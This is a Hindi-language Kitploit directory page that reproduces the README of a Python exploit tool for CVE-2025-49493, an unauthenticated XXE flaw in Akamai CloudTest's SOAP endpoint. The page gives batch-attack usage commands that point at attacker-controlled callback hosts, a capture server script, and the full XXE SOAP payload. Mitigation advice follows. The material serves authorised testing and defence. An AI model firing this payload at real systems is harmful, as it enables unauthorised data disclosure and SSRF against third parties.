Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49493 — यह CVE-2025-49493 के लिए एक Python-आधारित एक्सप्लॉइट है, जो Akamai CloudTest के 60 2025.06.02 (12988) से पहले के संस्करणों को प्रभावित करता है। यह कमज़ोरी SOAP सेवा एंडपॉइंट के माध्यम से XML External Entity (XXE) इंजेक्शन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/sh4den/cve-2025-49493
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubsh4den/cve-2025-49493

CVE-2025-49493

यह CVE-2025-49493 के लिए एक Python-आधारित एक्सप्लॉइट है, जो Akamai CloudTest के 60 2025.06.02 (12988) से पहले के संस्करणों को प्रभावित करता है। यह कमज़ोरी SOAP सेवा एंडपॉइंट के माध्यम से XML External Entity (XXE) इंजेक्शन की अनुमति देती है।

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Akamai CloudTest XXE एक्सप्लॉइट (CVE-2025-49493)

अवलोकन

यह CVE-2025-49493 के लिए एक Python-आधारित एक्सप्लॉइट है, जो Akamai CloudTest के 60 2025.06.02 (12988) से पहले के संस्करणों को प्रभावित करता है। यह भेद्यता SOAP सेवा एंडपॉइंट के माध्यम से XML एक्सटर्नल एंटिटी (XXE) इंजेक्शन की अनुमति देती है।

भेद्यता विवरण

  • CVE ID: CVE-2025-49493
  • भेद्यता प्रकार: XML एक्सटर्नल एंटिटी (XXE) इंजेक्शन
  • गंभीरता: क्रिटिकल (CVSS 9.1)
  • प्रभावित सॉफ़्टवेयर: Akamai CloudTest
  • प्रभावित संस्करण: 60 2025.06.02 (12988) से पहले
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: नहीं

तकनीकी विवरण

यह भेद्यता /concerto/services/RepositoryService SOAP एंडपॉइंट में मौजूद है, जहाँ XML इनपुट को बाहरी एंटिटीज़ के उचित सैनिटाइज़ेशन के बिना संसाधित किया जाता है। एक हमलावर XXE हमलों को ट्रिगर करने के लिए दुर्भावनापूर्ण XML पेलोड तैयार कर सकता है, जिससे संभावित रूप से निम्नलिखित परिणाम हो सकते हैं:

  • सूचना का खुलासा
  • SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी)
  • सेवा अस्वीकार (Denial of Service)
  • कुछ कॉन्फ़िगरेशन में संभावित RCE

विशेषताएँ

  • टारगेट डिस्कवरी: स्वचालित रूप से Akamai CloudTest इंस्टेंस की पहचान करता है
  • भेद्यता का पता लगाना: कमजोर एंडपॉइंट्स और संकेतकों की जाँच करता है
  • XXE एक्सप्लॉइटेशन: XXE पेलोड के साथ तैयार किए गए SOAP अनुरोध भेजता है
  • एकाधिक टारगेट: टारगेट फ़ाइलों से बैच प्रोसेसिंग का समर्थन करता है
  • विस्तृत लॉगिंग: टाइमस्टैम्प के साथ व्यापक रंगीन लॉगिंग
  • त्रुटि प्रबंधन: नेटवर्क समस्याओं के लिए मजबूत त्रुटि प्रबंधन

इंस्टॉलेशन

आवश्यक शर्तें

  • Python 3.6 या उच्चतर
  • pip पैकेज मैनेजर

निर्भरताएँ

आवश्यक पैकेज इंस्टॉल करें:

root@kitploit:~
pip install -r requirements.txt

या मैन्युअली इंस्टॉल करें:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

उपयोग

बेसिक उपयोग

root@kitploit:~
python main.py targets.txt xxe.attacker.com

एडवांस्ड उपयोग

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

कमांड लाइन विकल्प

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

टारगेट फ़ाइल फ़ॉर्मेट

एक targets.txt फ़ाइल बनाएँ जिसमें प्रत्येक पंक्ति में एक टारगेट हो:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

XXE सर्वर सेट करना

विकल्प 1: Burp Collaborator का उपयोग करना

  1. Burp Suite Professional खोलें
  2. Burp > Burp Collaborator क्लाइंट पर जाएँ
  3. अपना collaborator URL प्राप्त करने के लिए "Copy to clipboard" पर क्लिक करें
  4. इस URL को xxe_server पैरामीटर के रूप में उपयोग करें

विकल्प 2: Interactsh का उपयोग करना

  1. interactsh इंस्टॉल करें: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. चलाएँ: interactsh-client
  3. प्रदान किए गए URL को xxe_server पैरामीटर के रूप में उपयोग करें

विकल्प 3: कस्टम HTTP सर्वर

अनुरोधों को कैप्चर करने के लिए एक सरल HTTP सर्वर सेट करें:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

एक्सप्लॉइट प्रवाह

  1. टारगेट सत्यापन: URL फ़ॉर्मेट और पहुँच योग्यता को सत्यापित करता है
  2. भेद्यता का पता लगाना:
    • प्रतिक्रिया में CloudTest संकेतकों की जाँच करता है
    • SOAP सेवा एंडपॉइंट के मौजूद होने की पुष्टि करता है
  3. XXE पेलोड निर्माण: XXE के साथ दुर्भावनापूर्ण SOAP लिफ़ाफ़ा बनाता है
  4. एक्सप्लॉइटेशन: कमजोर एंडपॉइंट पर तैयार किया गया अनुरोध भेजता है
  5. परिणाम विश्लेषण: सफलता संकेतकों के लिए प्रतिक्रिया का विश्लेषण करता है

XXE पेलोड संरचना

एक्सप्लॉइट निम्नलिखित XXE पेलोड संरचना का उपयोग करता है:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

शमन

प्रशासकों के लिए

  1. तत्काल कार्रवाई:

    • Akamai CloudTest को संस्करण 60 2025.06.02 या उसके बाद के संस्करण में अपडेट करें
    • संदिग्ध XML प्रोसेसिंग गतिविधियों के लिए लॉग की निगरानी करें
    • एक्सपोज़र सीमित करने के लिए नेटवर्क सेगमेंटेशन लागू करें
  2. दीर्घकालिक समाधान:

    • XML पार्सर में XML एक्सटर्नल एंटिटी प्रोसेसिंग अक्षम करें
    • इनपुट सत्यापन और सैनिटाइज़ेशन लागू करें
    • XML प्रोसेसिंग के लिए अनुमति-सूचियों का उपयोग करें
    • नियमित सुरक्षा मूल्यांकन

डेवलपर्स के लिए

  1. सुरक्षित XML प्रोसेसिंग:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. इनपुट सत्यापन:

    • सभी XML इनपुट को सख्त स्कीमा के विरुद्ध सत्यापित करें
    • XML प्रोसेसिंग से पहले उपयोगकर्ता-नियंत्रित डेटा को सैनिटाइज़ करें
    • उचित त्रुटि प्रबंधन लागू करें

संदर्भ

  • xbow द्वारा मूल शोध
  • Akamai CloudTest चेंजलॉग
  • CVE-2025-49493 विवरण
  • OWASP XXE रोकथाम

कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं। इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं।

योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएँ
  3. अपने परिवर्तन करें
  4. यदि लागू हो तो परीक्षण जोड़ें
  5. पुल रिक्वेस्ट सबमिट करें

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

लेखक

  • मूल शोध: xbow, 3th1c_yuk1
  • एक्सप्लॉइट विकास: सुरक्षा अनुसंधान टीम
  • CVE असाइनमेंट: CVE-2025-49493

चेंजलॉग

v1.0.0

  • प्रारंभिक रिलीज़
  • बेसिक XXE एक्सप्लॉइटेशन कार्यक्षमता
  • टारगेट फ़ाइल समर्थन
  • व्यापक लॉगिंग
  • त्रुटि प्रबंधन में सुधार
टूल डाउनलोड करें